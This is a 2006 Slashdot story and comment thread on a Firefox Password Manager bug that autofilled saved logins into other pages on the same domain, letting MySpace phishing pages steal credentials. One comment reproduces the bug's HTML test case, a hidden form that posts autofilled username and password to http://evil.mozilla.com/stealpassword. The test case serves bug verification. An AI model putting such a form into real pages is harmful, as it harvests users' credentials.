Beta
×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Firefox 2.0 Password Manager Bug Exposes Passwords

kdawson posted more than 7 years ago | from the be-careful-out-there dept.

315

zbuffered writes, "Today, Mozilla made public bug #360493, which exposes Firefox's Password Manager on many public sites. The flaw derives from Firefox's willingness to supply the username and password stored on one page on a domain to another page on a domain. For example, username/password input tags on a Myspace user's site will be unhelpfully propagated with the visitor's Myspace.com credentials. It was first discovered in the wild by Netcraft on Oct. 27. As this proof-of-concept illustrates, because the username/password fields need not be visible on the page, your password can be stolen in an almost completely transparent fashion. Stopgap solutions include avoiding using Password Manager and the Master Password Timeout Firefox extension, which will at least cause a prompt before the fields are filled. However, in the original case detailed in the bug report, the phish mimicked the login.myspace.com site almost perfectly, causing many users to believe they needed to log in. A description of this new type of attack, dubbed the Reverse Cross-Site Request (RCSR) vulnerability, is available from the bug's original author."

cancel ×

315 comments

Sorry! There are no comments related to the filter you selected.

But but but.... (5, Funny)

Anonymous Coward | more than 7 years ago | (#16941742)

...secure by design!!

I sense a disturbance in the force... (5, Funny)

LordEd (840443) | more than 7 years ago | (#16941786)

...as though millions of Firefox users were laughing at IE users, and were suddenly silenced.

Cue "still more secure" arguments now.

Re:I sense a disturbance in the force... (0, Troll)

0232793 (907781) | more than 7 years ago | (#16941812)

IE has the same problem - RTFA

Re:I sense a disturbance in the force... (4, Interesting)

LordEd (840443) | more than 7 years ago | (#16941902)

I tested the proof of concept attack on IE7 before posting. The attack failed. TFA even says
RCSR attacks are also actively targeting Microsoft Internet Explorer, however a flaw in Firefox makes the attack much more likely to succeed.
Go RTFA (the proof of concept one) using IE and reply if you get a different result. I didn't try it with IE6.

Re:I sense a disturbance in the force... (2, Informative)

Digitalia (127982) | more than 7 years ago | (#16942202)

I tried it with both IE6 and IE7 and can confirm that on both of the computers I tried, the proof-of-concept page failed.

Many FF fans would say... (5, Insightful)

patio11 (857072) | more than 7 years ago | (#16942506)

... this is just because IE6/7 have poor compatibility with the rest of the world. They can't even support the exploits, anymore, honestly.

OK, jokes aside, someone just released an exploit into the wild which *can't work on IE*. And they presumably still thought they were going to get something of value on it. Hiya, FireFox, welcome to the "visible enough to be a target" club. And it only gets worse. I hope your million bug finding eyes are bright and perky because it only gets worse and it never, ever stops.

RTFA? (2, Funny)

smitty_one_each (243267) | more than 7 years ago | (#16941968)

RTFA?
The hell, you say.
'Tis slashdot, bucko:
No read-read today.
Always for good suds we pray.
Burma Shave

Re:I sense a disturbance in the force... (1)

Zonnald (182951) | more than 7 years ago | (#16942118)

"Note MSIE6|7 do the same." 1 line provided by a user with no information to back it up. Quality citation.

Re:I sense a disturbance in the force... (1)

LordEd (840443) | more than 7 years ago | (#16942360)

Did you try it? Care to make it 2 lines provided with 2 users to back it up?

Or would you prefer the 1 user multi-lined wordy edition?
I, LordEd (user 840443), hereby solemnly swear under penalty of being modded down that my attempt to make the proof of concept page fail was genuine and that the result was an unsuccessful attack.

Dated November 21, 2006 at 4:07 pm (PST).
Witnessed by my cat.
Would you like me to grab the domain heyslashdotitrieditandfoundie6didntfail.com and make a page/blog entry that says it doesn't fail?

Re:I sense a disturbance in the force... (1)

diegocgteleline.es (653730) | more than 7 years ago | (#16942268)

So the fact that your passwords can be stolen not just in IE, but also in Firefox, makes you happier?

Re:I sense a disturbance in the force... (1)

LordEd (840443) | more than 7 years ago | (#16942396)

No, the fact that the passwords were not stolen in IE made me happier. The attack failed (as in was unable to acquire the password).

But if anybody cares, I'm still a Firefox user. I never use the save password feature.

Re:I sense a disturbance in the force... (1)

Fuzzums (250400) | more than 7 years ago | (#16941866)

Nope. I just prefer FF :D

Re:I sense a disturbance in the force... (0)

kevintron (1024817) | more than 7 years ago | (#16942014)

Let's see now. Internet Explorer has numerous gaping security holes, in actual widespread use, that make my own computer vulnerable to intrusion and could even result in malware taking over my system to turn it into a zombie. Firefox turns out to have a flaw that might, in theory, allow someone to pose as me on various web sites.

I'm still laughing at the IE users.

Re:I sense a disturbance in the force... (1)

1trickymicky (924393) | more than 7 years ago | (#16942152)

yeah that was a weak attempt

Re:I sense a disturbance in the force... (1)

diersing (679767) | more than 7 years ago | (#16942608)

Um, I think its more then a theory, of course there thousands of practical exploits for MS and IE. No OS or application is immune, its just proves EVERYONE must keep things updates on a regular basis and generally be cautious.

Just 2.0 ? (0)

Anonymous Coward | more than 7 years ago | (#16941760)

is that just for FF2.0 or below ?

Re:Just 2.0 ? (0, Redundant)

Dj Stingray (178766) | more than 7 years ago | (#16942280)

I just ran the test on 1.5.0.8 and I am affected.

Re:Just 2.0 ? (1)

spatley (191233) | more than 7 years ago | (#16942478)

Same here in 1.5.0.2

Re:Just 2.0 ? (0)

Anonymous Coward | more than 7 years ago | (#16942574)

I just ran the test on 1.5.0.7 and I am not affected.
i really tried hard too allowing scripts to run and even a pop up window maybe it doesn't work the same on ubuntu

Re:Just 2.0 ? (2, Interesting)

Svippy (876087) | more than 7 years ago | (#16942552)

Firefox 3.0 does not seem to have the problem. But Firefox 3.0 is still in Alpha. So yeah.

SEE! (-1, Flamebait)

Anonymous Coward | more than 7 years ago | (#16941766)

Firefox can be just as bad, if not worse than IE!
scumbags...

Nelson sez: (-1, Flamebait)

Anonymous Coward | more than 7 years ago | (#16941776)

Haw haw!

passwords have failed (5, Insightful)

hackstraw (262471) | more than 7 years ago | (#16941816)


Now that its 2006, can we now use a better form of "authentication" than a few ascii characters?

Every website wants you to have a password. You know, for important stuff like making a purchase because you use a password for a purchase at a brick and mortar store, right?

Well, since its a good practice to use unique passwords, and users get forgetful, then they use the web browser tool to store their passwords, then they forget their passwords, and when they use another computer or update their existing one, their tool does not work, and if it does work, then the browser gives away your passwords.

I don't use a password to get into my home, I don't start my car with a password, I don't use a password to get into my work. In fact, I don't even have a key for my work, server room, nothing (RFID). But all day at work, these programs continually ask for my password to the point that I dont consider my password secure because I have to change it, and use it so much, I'm desensisized (sp?) and say who cares?

Can we get over passwords soon?

Re:passwords have failed (2, Funny)

Anonymous Coward | more than 7 years ago | (#16941980)

Did you have a proposed solution? Or were just cryin' like a little bitch with a skinned knee and shit [imdb.com] ?

Re:passwords have failed (5, Insightful)

AlXtreme (223728) | more than 7 years ago | (#16942060)

I don't use a password to get into my home, I don't start my car with a password, I don't use a password to get into my work. In fact, I don't even have a key for my work, server room, nothing (RFID).
Locks get picked. Cars get stolen. RFID can be disrupted, tampered with or your card can get stolen (I'm assuming you don't have RFID tags in your arm). Likewise, passwords can be sniffed. Hell, it doesn't matter how good your encryption is, all it takes is a videocamera pointed at your keyboard.

How far you go, it doesn't matter. There will always be a trade-off between security and convenience. Personally, I trust a good lock more than I trust RFID. But even if you go all the way to biometrics, there will always be way a to hack the system.

Even so, this Firefox security flaw is a nasty one.

Re:passwords have failed (1)

Steppman2 (1029992) | more than 7 years ago | (#16942266)

From what I understand you'd still have to hit some form of submit button (fields are hidden but once Firefox fills them in you gotta get them to their server somehow). It seems to me like this kind of thing is an unforeseen natural side effect of anything that automatically fills in your information...Firefox is just doing what it's been told to do on that site, although I fail to see the mass damage here besides a bunch of emo kids getting their MySpace pages defaced since I doubt important sites like financial institutions or government related pages allow any custom content like this. The only thing that would scare me is if a phishing attack could use this to have it automatically entered...now that would be a bug.

Re:passwords have failed (1)

makomk (752139) | more than 7 years ago | (#16942498)

Well, JavaScript could be used to submit the form automatically, but any site that allows JavaScript in user-created content and has logins already has bigger security holes to worry about.

Re:passwords have failed (5, Interesting)

irc.goatse.cx troll (593289) | more than 7 years ago | (#16942070)

I strongly hope so. My recommendation would be public key authentication, the way SSH can do it. You'd need a private key (possibly on a crypto card, but a thumbdrive or floppy or whatever works fine) and a password for that. You authenticate to the key when launching your encryption agent, then any website that wants to verify who you are contacts your agent and does the authentication there.

Infinitely more secure than our current password system, a lot more convenient (think Microsoft Passport's bragged about convenience, except none of your data is stored on a central server), and all around the BetterWay(tm). The main downside if when roaming to another machine if you don't have your key, you don't have access. This can be addressed with either being able to fall back on a password (removing a lot of the security), or some means of authenticating to your home computer.

You could also add some sort of spec for feeding VCard info into the agent so that sites could use it to do a sort of shared profile feature, where you'd authorize a site to receive certain info and save you a lot of time filling stuff out.

Unfortunately this is just yet another thing on the list of "tech the way I think it should be", not anything on anyones todo lists.

Re:passwords have failed (1)

Xugumad (39311) | more than 7 years ago | (#16942180)

> The main downside if when roaming to another machine if you don't have your key, you don't have access.

USB flash drives are becoming really popular. Some standard location on a flash drive to place a private/public key pair, would mean you could provide credentials just by sitting down at a PC and plugging in your flash drive. Having said that, then means losing the drive is... really, really bad. Also means a virus infected system could grab your keys, but then that's more or less a risk with passwords anyway.

I suppose, ideally, what we want is a stand alone device that plugs into USB, a PIN is entered into the device to enable it, and it handles all signing requests, with the keys never leaving the device itself. That's getting fairly fiendishly complex, though...

Java ring? (4, Interesting)

CustomDesigned (250089) | more than 7 years ago | (#16942374)

Remember the Java ring? It had a processor and stored the private key in a tamper resistant case (erases instantly when case is compromised). PC programs would ask the Java ring to sign things. A virus could get bogus signatures while it was connected, but couldn't compromise the key. Unfortunately, it used a funky "One Wire" adaptor to get power and talk to a PC. If only they would reintroduce it in a USB format!

Re:Java ring? (1)

mmontour (2208) | more than 7 years ago | (#16942694)

Unfortunately, it used a funky "One Wire" adaptor to get power and talk to a PC. If only they would reintroduce it in a USB format!

They do sell USB adapters for iButtons - see http://www.maxim-ic.com/products/ibutton/products/ adapters.cfm [maxim-ic.com] . However it looks like the crypto iButton itself has been discontinued. I hope that someone does release a similar product in the future, before the battery dies in the one I am currently using.

Re:passwords have failed (1)

Xugumad (39311) | more than 7 years ago | (#16942082)

Yes! I'd love to see Firefox adapted to make client side certificates trivial (keep in mind that there's no need for the server to know that the client certificate is who it says it's from, only that the same certificate is always the same person), and more sites move to using SSL certificate authentication. For, y'know, useful things like never actually providing re-usable credentials to the server...

Re:passwords have failed (4, Insightful)

Crudely_Indecent (739699) | more than 7 years ago | (#16942246)

Passwords work great for me. I, however, use them with care.

Any site that uses financial information (my bank, eBay, PayPal, Amazon, or whatever I'm buying, my own servers, etc.) doesn't get the password stored in any form of password manager. On the other hand, inconsequential services like news sites, LUG sites, aquarium discussion groups and the like may have the passwords stored. If it's important, don't store it, don't write it on a post-it note, don't tell your friends.....people cannot be trusted.

It seems that any security protocol can be circumvented by exploiting the end users who use them poorly or rely on something other than common sense for security.

It took all of about 5 minutes to explain phishing to my girlfriend. Now, she's almost 1/104358506th as paranoid as I am, which is a good start.

Now, I'm out of tinfoil......off to the store.

Re:passwords have failed (1)

peragrin (659227) | more than 7 years ago | (#16942436)

The bigger problem is automatic passwords for websites. I never understood why such a feature would be installed. it's far safer to use a third party app, and look up the passwords as you need them. I can remember some but not all of mine. but all I need to remember is three.

one to log onto my machine. One to decrypt an encrypted filesystem, and the third is for application in which I store the information. With OS X I can literally click twice, type in both passwords and can look up the forgotten password in 10 seconds. Closing the app and I can unmount the filesystem later.

I know such a thing is available under both windows and Linux. Why don't more people use it?

Re:passwords have failed (1, Funny)

Anonymous Coward | more than 7 years ago | (#16942446)

I know! Let's use a centralized auth. server! We will name it Passport!!! [wikipedia.org] - ...damn never mind

Is it used? (5, Insightful)

oyenstikker (536040) | more than 7 years ago | (#16941818)

People actually let their browsers remember their passwords? I have never trusted my browser that much.

Re:Is it used? (2, Funny)

wumpus188 (657540) | more than 7 years ago | (#16941966)

That's what this new service is for. Let others remember your passwords!

Re:Is it used? (1)

crabpeople (720852) | more than 7 years ago | (#16942030)

Well considering the first time you enter form information FF prompts you to "Save information so you dont have to type it again", well what clueless luser wouldn't do that? Lusers hate to type!

Saving passwords should not be a browser feature. I am ashamed that such a big bug could make it into firefox. Hopefully staying on 1.5 and not using any sort of "password management" (except cookies) will keep me safe from this. At least it will probably be ficed today, if it hasn't already been fixed.

Not a lot of better options (4, Insightful)

Kadin2048 (468275) | more than 7 years ago | (#16942068)

If you have 50-100 passwords at various sites, established over years, there's really a shortage of other good options. You can go the old-school route and just write them all down on a pad of paper, or the slightly more sophisticated route and put them in a text file or encrypted database on your local machine, but that doesn't help you when you want to log into a site from another machine.

I was disappointed to hear of this vulnerability, because I use Google Browser Sync pretty heavily for keeping track of cookies and trivial passwords, and to be honest I'm not really sure what I'd do without it. More important passwords I keep in an old Palm Pilot using a GPLed password-management and generation program on it, but recalling passwords from it is a pain (takes several minutes to get Palm out, type in master password, etc.).

Re:Not a lot of better options (1)

Bogtha (906264) | more than 7 years ago | (#16942294)

I was disappointed to hear of this vulnerability

I was puzzled to hear of this vulnerability. I am certain this exact topic has come up before in relation to saving passwords, over a year ago. I thought it was going to be addressed by making the forms non-submittable by JavaScript, and giving the input fields fake blank values when JavaScript read them - of course, only when the form information was automatically entered by the browser.

Did I just imagine all that, or can somebody else confirm this is a long-established problem?

Re:Is it used? (3, Interesting)

Firehed (942385) | more than 7 years ago | (#16942134)

It's not your own browser to worry about. It's others browsers. My roommate decided to borrow my machine and was stupid enough to have Firefox remember his password on my machine to the main school portal. No biggie, except that the 'reveal all passwords' button exists (and, last I checked, required no authentication to use).

Of course, the truly telling moment was when I found out how lame his password is. Not that I'd expect anything different from someone dumb enough to store their password on someone else's computer in the first place.

So, in other words, passwords continue to be useless for people dumb enough to leave them lying around. I've used the same password for years and it's by no means secure (only just a bit more secure than using my first name) but it's never been an issue for me. The only time I've been concerned is when websites force me to come up with something that fits their requirements, because that means that I do end up writing it down somewhere. The sooner webmasters realize that setting specific requirements for passwords makes them less secure (my bank requires an alphanumeric PW 6-8 letters long with mixed case - that massively narrows down a brute force attack), the better. In the end, most of it comes down to user stupidity, so we might as well not limit the complexity of good users or force them to use something too obscure to remember (or, worse, say 'write this down in a place you can easily access').

Re:Is it used? (4, Informative)

Odiumjunkie (926074) | more than 7 years ago | (#16942566)

> No biggie, except that the 'reveal all passwords' button exists (and, last I checked, required no authentication to use). Firefox, for as long as I can remember, has allowed you to set a master password, without which the password manager will not populate any password feilds and will not allow the viewing of any stored passwords.

Re:Is it used? (1)

geekoid (135745) | more than 7 years ago | (#16942754)

"the truly telling moment was when I found out how lame his password is. "

so, what was it?

Opera Vulnerable? (1)

JordanL (886154) | more than 7 years ago | (#16942204)

Does anyone know if this attack is possible on Opera? Opera's wand has been around longer than FireFox has, so I'm kinda curious. It seems like something people could exploit in more than just FireFox.

Re:Is it used? (1)

EvanED (569694) | more than 7 years ago | (#16942418)

I use it all the freaking time. I don't want to be constantly entering my password. I'm lazy.

Now, granted, my computer doesn't remember my bank password for instance... I enter that each time. (I don't even know it... it's a ~14 character, randomly generated password stored in a PasswordSafe database.) But for sites like /., you betcha that Firefox knows my password.

Re:Is it used? (4, Interesting)

makomk (752139) | more than 7 years ago | (#16942578)

I use Konqueror/KWallet to remember most of my password. It's encrypted (requires a password to access), only fills in the forms on the page you originally hit "Save Password" on (inconvenient, but helps reduce the security issues), and closes the wallet (requiring re-entry of the password) when I lock my screen, my screensaver starts up, or after 10 minutes of non-use of the wallet. Slightly paranoid compared to Firefox, but it works.

Re:Is it used? (1)

kosmosik (654958) | more than 7 years ago | (#16942756)

Yeah I do. It is like I use the Web a lot. Think SlashDot, think Del.Ic.iosus..whateva think whatever little forum or not so important web service. I do store the password in browser. What else do you suggest? Remembering 100+ different passwords maybe is possible for me but I've got better things to do. :)

I use quite common scheme - I don't care about remembering my passwords at all if they are related to not so critical things like my Slashdot account, Bugzilla account for project Foo etc. etc. - I generate random passwords for these accounts and let my browser remember it.

For more critical stuff I use keys/keychain (like remote login to servers) or I have few passwords that I really remember (bank account, eBay etc.).

Isn't it like all people do?

just update it? (1)

diegocgteleline.es (653730) | more than 7 years ago | (#16941822)

Stopgaps solutions are not a solution, I guess they're planning a 2.0.1 soon? The bug has been reported 10 days ago...

This just in... (0)

Anonymous Coward | more than 7 years ago | (#16941826)

Firefox 2.1 released, with new and improved stability, affordability, portability, extendability, pluginability, and securability.

Arrrrr (3, Insightful)

Peyna (14792) | more than 7 years ago | (#16941834)

The flaw derives from Firefox's willingness to supply the username and password stored on one page on a domain to another page on a domain.

Worst idea ever. The question isn't why wasn't this discovered earlier, but who decided this was a good idea in the first place?

Re:Arrrrr (1)

LunaticTippy (872397) | more than 7 years ago | (#16941934)

Agreed. I've had to help too many people who use autofill passwords and don't know the passwords when they change machines or use another pc. I avoided the whole thing because it seemed likely to allow me to forget passwords, and didn't seem totally secure.

Re:Arrrrr (1)

sweatyboatman (457800) | more than 7 years ago | (#16941974)

actually this is a great idea for all those stupid sites that require you to have a user-name and password for no particular reason. With FF I can put in whatever garbage info I want for the registration and it will remember the login for me next time I load the page. Obviously, for important sites (e.g. not a myspace account) I tell FF to not remember the password.

Yes, this vulnerability is a problem and needs to be fixed, but let's not throw the baby out with the bathwater.

And for you, Mr-I-Dont-Like-It, you can just turn the feature off.

Re:Arrrrr (1)

Peyna (14792) | more than 7 years ago | (#16942240)

It's a good feature when it works only for each site. But why should it be taking what I put in at gmail to log in and sticking that login/password into some other site? That's the problem.

Re:Arrrrr (1)

LunaticTippy (872397) | more than 7 years ago | (#16942718)

I end up using different computers enough that this would be an inconvenience. I'd be ok until I was somewhere that didn't know my passwords, then I'd have to go through the unpleasant retrieval process just to post to slashdot.

I also don't want to cultivate habits that'd give out my password to firefox on whoever's machine I'm on.

Re:Arrrrr (4, Insightful)

jesser (77961) | more than 7 years ago | (#16942172)

When browsers added password management features 5 (?) years ago, there weren't a lot of sites that required passwords, included user-generated content, and allowed that user-generated content to include password fields. But there were (and still are) many sites where loading just about any URL on the site could give you a "you need to log in" page.

I'd be perfectly happy with this becoming part of the accepted security model for web applications, just like "don't let user-generated content include SCRIPT tags with arbitrary content".

Re:Arrrrr (1)

(H)elix1 (231155) | more than 7 years ago | (#16942442)


>>The flaw derives from Firefox's willingness to supply the username and password stored on one page on a domain to another page on a domain.

>Worst idea ever. The question isn't why wasn't this discovered earlier, but who decided this was a good idea in the first place?


Well, if they read /., it would seem the site is it.slashdot.org, games.slashdot.org, and a mess of other sub-domains. I can see why they might think subdomain 'sharing' was a good idea. Logging in on my blackberry is a real treat if I flush the passwords.

Not just Firefox 2.0, also IE6/7 and earlier F'fox (4, Informative)

Andy_R (114137) | more than 7 years ago | (#16941870)

According to the Bugzilla link, this bug is also present in pre 2.0 releases of Firefox, and IE 6/7.

So much for me being smug about going back to Firefox 1.5!

Re:Not just Firefox 2.0, also IE6/7 and earlier F' (1)

quantaman (517394) | more than 7 years ago | (#16942176)

I'm running 1.5 and the exploit worked for me.

stopgap measures include... (3, Funny)

Gary W. Longsine (124661) | more than 7 years ago | (#16941876)

...using Microsoft Internet Explorer. AAaaaaaaaaaaaargh!

Re:stopgap measures include... (1)

Constantine Evans (969815) | more than 7 years ago | (#16941954)

According to the bugzilla link, IE 6 and 7 are also affected.

Re:stopgap measures include... (1)

Zonnald (182951) | more than 7 years ago | (#16942292)

IE6 didn't even ask to save password - no problems here - walks away.

Yeah, but... (0)

Anonymous Coward | more than 7 years ago | (#16942554)

...IE 6 is such shite, you' WANT to walk away...

Re:stopgap measures include... (1)

fireman sam (662213) | more than 7 years ago | (#16941976)

Stop the gap, by knocking down the building

Re:stopgap measures include... (0)

Anonymous Coward | more than 7 years ago | (#16942162)

... using another browser. Doesn't have to be IE. Netscape (8.1.2) and Opera (9.0.1) both survived the proof-of-concept. Not sure about Konqueror or Safari, since I'm at work.

What an incredible gaffe (0)

Digitalia (127982) | more than 7 years ago | (#16941886)

It is absolutely shocking that such a serious bug would be discovered in Firefox. This is why I was reluctant to upgrade to 2.0 when it first came out. Sadly, I bit the bullet and upgraded anyways.

Unfortunately, the dev team has shown its fallibility in one of the most idiotic ways possible. If they resolve the problem quickly, they may be absolved of their negligence. Otherwise, it will be difficult to continue advocating for Firefox as vocally as I have in the past.

Re:What an incredible gaffe (2, Informative)

Andy_R (114137) | more than 7 years ago | (#16942026)

Of course it's far less shocking that the same bug is present in IE6 and IE7! I wonder which browser you will be recommending... do you know of one that passes the test-case linked to from the bugzilla page?

Re:What an incredible gaffe (2, Interesting)

Digitalia (127982) | more than 7 years ago | (#16942108)

I tested IE6 and IE7 and the proof of concept page failed to work in both browsers. Neither browser passes the stored browser on to Google.

Have you personally tested this and found either browser to be vulnerable?

Re:What an incredible gaffe (1)

vertinox (846076) | more than 7 years ago | (#16942132)

Perhaps there is code to not work if it detects the User Agent for anything other than FF2.0?

Re:What an incredible gaffe (1)

Zonnald (182951) | more than 7 years ago | (#16942332)

Absolutely, because the folks at bugzilla so want to show that IE6/7 are better browsers then MSIE.

Did you even look at the source?

bug 360493
  1. Enter real name and real password and submit real form.
  2. Choose Remember this password.
  3. Submit fake form
  4. Test fails if evil.mozilla.com gets real password
real name real password
fake name fake password

Re:What an incredible gaffe (1)

Zonnald (182951) | more than 7 years ago | (#16942364)

Damn. I didn't expect that used a blockquote didn't leave HTML intact ...
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>bug 360493</title>
</head>
<body>
<ol>
<li>Enter real name and real password and submit real form.</li>
<li>Choose Remember this password.</li>
<li>Submit fake form</li>
<li>Test fails if evil.mozilla.com gets real password</li>
</ol>
<div>
<form name="real" action="#" method="get">
<div>
real name <input name="name" type="text" />
real password <input name="password" type="password" />
<input type="submit" value="real form"/>
</div>
</form>
</div>
<div>
<form name="fake" action="http://evil.mozilla.com/stealpassword" method="get">
<div>
fake name <input name="name" type="text" />
fake password <input name="password" type="password" />
<input type="submit" value="fake form" />
</div>
</form>
</div>
</body>
</html>

Re:What an incredible gaffe (2, Insightful)

ResidntGeek (772730) | more than 7 years ago | (#16942124)

Right, because you contribute to Firefox, right? If you did, you'd of course have been able to spot this bug with your razor-sharp eyes, right? Oh wait... no, I just remembered you're fallible too, and quite possibly an idiot. Firefox is free. The dev team doesn't have to do shit, they choose to. Stop acting like an entitled 8-year-old at Christmas, and do something useful with your time.

Re:What an incredible gaffe (1)

Digitalia (127982) | more than 7 years ago | (#16942378)

If we follow your flawed logic to its conclusion, you're arguing that an open source project should be immune from criticism because it's charity. Do you think that open source contributors should not be accountable for major security screw ups?

Firefox may be free. However, its developers are just as accountable for their mistakes as Microsoft should be for its own. Firefox gained the market share that it has because of a reputation for security. When the dev staff screw up so badly, it does a lot to erode their reputation. Though I may not contribute to the project, I have a right as an end user to expect a relatively secure product. The occasional, obscure buffer overflow exploit is excusable. A massive flaw in conception, design, and execution is certainly not.

I think that you've misunderstood not only my initial post but also the fundamental philosophy behind the open source movement. If every developer thought as you did, no end users would bother to use your goods. Judging from your haughty demeanor, I suspect you consider this a good thing.

Re:What an incredible gaffe (1)

PastAustin (941464) | more than 7 years ago | (#16942226)

It would seem sort of silly to me to stop advocating Firefox because it has one BIG bug. Most browsers have 100 HUGE bugs. It is still better than any other browser.

I wouldn't think this would be a hard fix. Silly Firefox development team. =)

What an incredible retard you are (0)

Anonymous Coward | more than 7 years ago | (#16942408)

IDIOT. IE6, IE7, FF1.5, FF2.0, Opera all affected. So what browser is someone like you using up their on your high fucking horse?

Re:What an incredible retard you are (0)

Anonymous Coward | more than 7 years ago | (#16942480)

IDIOT. IE6 and IE7 definitely not affected. So why are you such a retard?

i used that one (0, Troll)

User 956 (568564) | more than 7 years ago | (#16941918)

A description of this new type of attack, dubbed the Reverse Cross-Site Request (RCSR) vulnerability

I used that one on my girlfriend. I believe it's also called the "Dirty Sanchez".

Re:i used that one (1)

Zonnald (182951) | more than 7 years ago | (#16942410)

Actually the word is "Filthy".

the bug's original author (0)

Anonymous Coward | more than 7 years ago | (#16941926)

Why didn't he just code it right to start with

>:(

Meh ... (1)

Purity Of Essence (1007601) | more than 7 years ago | (#16941930)

My feeling is, people who rely on "password managers" get what they deserve when their passwords end up in the wrong hands. It's generally just a bad idea to store passwords anywhere but your head.

Re:Meh ... (1)

Jamu (852752) | more than 7 years ago | (#16942690)

If I used my head to store passwords, I doubt anyone would get them. Including me.

Re:Meh ... (1)

Propaganda13 (312548) | more than 7 years ago | (#16942760)

I don't know about the deserve part, but this is one of the reason I don't use password managers. Another one is that when you don't type in passwords, you're more likely to forget them so if the password manager gets corrupted, deleted, infected, etc. then you're SOL.

For most home users, a paper with passwords written on it is safer in the long run. Preferably the paper is not in plain sight or stuck to the monitor.

Dis-satisfied with v2.0 (3, Informative)

macdaddy (38372) | more than 7 years ago | (#16941984)

I don't know about everyone else but I am generally dis-satisfied with v2.0. Frankly I felt that the memory leak in FF was significantly amplified in 2.0. I noticed back on 1.5 that every time I put my laptop into standby with FF running and then woke it up that FF would slowly increase it's memory consumption to about 30% more than what it was before being put into standby. Ie, if it was 100MB when it went to standby it would be around 130MB after waking the laptop, switching focus to FF, and clicking through my opened tabs. In FF 2.0 I have to literally shutdown FF every day or two or FF will easily consume upwards of 500MB of my RAM. I usually have about a dozen windows open and in each window I have 5-15 tabs. That's a fair bit but it didn't cause me much grief in v1.5.

It also took me a while to figure out how to remove the close button from each tab [wordpress.com] . The tab scrolling "feature" was also a point of great annoyance that took up more of my time to find a fix [lifehacker.com] .

In short I'm just not jumping for joy over FF. This new flaw happens to come to light the day after I search Google for a way to manually add userids and passwords to the FF DB (any ideas?). This was to address the problem of FF not picking up some text fields as userid and password fields. One solution I found was RoboForm [roboform.com] , though I'm not sure I want to pay for what I think should be a fairly easy thing to do inside FF. FF is getting better but personally I'd rather be using Mozilla 1.7.x.

I Love FF BUT its not in the spirit of OS (1)

GenKreton (884088) | more than 7 years ago | (#16941996)

I love firefox and am very thankful for it being opensource but I loathe how Mozilla chooses to track and report bugs. I have been going around for days and could've been exploited - possibly but not probably - instead of being able to take appropriate measures to protect myself. It's not like this was some little secret the code was already out in the wild to do it. I find this security through obscurity in opensource projects absolutely disgusting. While we are possibly getting compromised they are sitting on their hands. We, the community, are here to quickly fix problems like these too. Thousands of developers could've and would work on this who the bug was hidden from. This makes the development process absolutely useless...

Sounds more like a bug in myspace (2, Insightful)

SlightlyMadman (161529) | more than 7 years ago | (#16942010)

I thought the rule of thumb for any user-created content was to never allow freeform html? You either let them control their formatting with a separate markup (like BBCode), or you limit them to specific tags (like they do here). In neither of these situations is this exploit possible.

Allowing full html coding, including embedding java or javascript, is an invitation for the unscrupulous. That's one of the 500 reasons I can think of to never visit a website like myspace.

That said, much like language, the web is defined by its users. While I don't feel like it's Firefox's responsibility to fix issues like this, they'd do best to be aware of it. It wouldn't be a bad idea at all to tie password remembering to the exact url (at least everything up to the "?") by default.

Re:Sounds more like a bug in myspace (1)

bwy (726112) | more than 7 years ago | (#16942508)

Allowing full html coding, including embedding java or javascript, is an invitation for the unscrupulous. That's one of the 500 reasons I can think of to never visit a website like myspace.

I don't think your logic makes sense. Any scammer out there can get a nearly free hosting plan and upload whatever content they want. Using your logic, you'd never visit any web site created by anyone. You'd certainly never click a link on Google because you have no way of knowing what is on the other end (and you'd only feel "safe" when you could be sure the content on the other end was created with some locked down UI?)

Re:Sounds more like a bug in myspace (2, Informative)

Bogtha (906264) | more than 7 years ago | (#16942644)

Any scammer out there can get a nearly free hosting plan and upload whatever content they want.

Yes, but that's not a problem because they aren't on a domain where you have a saved password. The problem here is that random people can upload content to, say, myspace.com, and if you have a password for myspace.com, your browser will automatically fill their form in. When an attacker uploads something to attacker.example.com, you aren't going to care because you don't have a saved password for attacker.example.com.

Re:Sounds more like a bug in myspace (0)

Anonymous Coward | more than 7 years ago | (#16942726)

FYI, Myspace don't allow javascript anymore. Posting anonymous for obvious reasons...

That is Scary (2, Informative)

EricJ2190 (1016652) | more than 7 years ago | (#16942084)

That is disturbing to me since I use FF2 to store many of my passwords. However, I don't store passwords for more critical sites, like my bank's website. I recommend others do the same.

Re:That is Scary (0)

Anonymous Coward | more than 7 years ago | (#16942328)

That is because the bank's site doesn't allow you to do so... unless bank in shitty bank.

Waiting for FF 3.0 (1)

tcolberg (998885) | more than 7 years ago | (#16942148)

I am still using FF1.5 because of all the problems with 2.0. Not just bugs like these, although they are disappointing, but reports of the ever present memory leak and the annoying revamps to the tabs bar. Then again, I am eagerly looking forward to upgrade to a better version so I can get some of the improvements, like crash restoration.

Re:Waiting for FF 3.0 (1)

Mattwolf7 (633112) | more than 7 years ago | (#16942502)

Firefox 2 can have Firefox 1.5 tabs - Browser.tabs.closeButtons: 3 [mozillazine.org]
Memory seems better in FF2 to me

And this bug is present in all versions of FF and IE...

No, No, No, This is impossible... (0)

Anonymous Coward | more than 7 years ago | (#16942182)

FireFox is OpenSource so it is impossible for it to have bugs let alone secuirty problems. Only Windows has security problems. Buy a Mac - it has no problems and is perfect.

The patch... (1)

alyawn (694153) | more than 7 years ago | (#16942216)

An where's the patch for this? If the bug was hidden from all, then why would they go public with it without a patch? And why would they hide it in the first place? Open source developers could have submitted patches already!

no need to save passwords --generate em on the fly (4, Interesting)

caseih (160668) | more than 7 years ago | (#16942278)

There is a neat little piece of javascript at http://www.xs4all.nl/~jlpoutre/BoT/Javascript/Pass wordComposer/ [xs4all.nl] that lets you just think up a master password in your head and then use this applet to automatically generate a site-specific, unique hash and fill in the password field automatically. This way you can remember the passwords easily, you never have to save them or write them down. And if one site gets compromised, that password (the hash) won't work with any other site. The drawback is that if you don't have this piece of javascript then you can't get into your sites.

Obligatory disclaimer! (2, Funny)

FaustIN (1030298) | more than 7 years ago | (#16942342)

Aha!... that's why sometimes I don't remember posting bad language comments!

Thought until now of multiple personality but mystery solved! It was just my browser!...

PS: I shall not be held accountable for ANY of my comments...

Any Password?? (1)

er824 (307205) | more than 7 years ago | (#16942350)

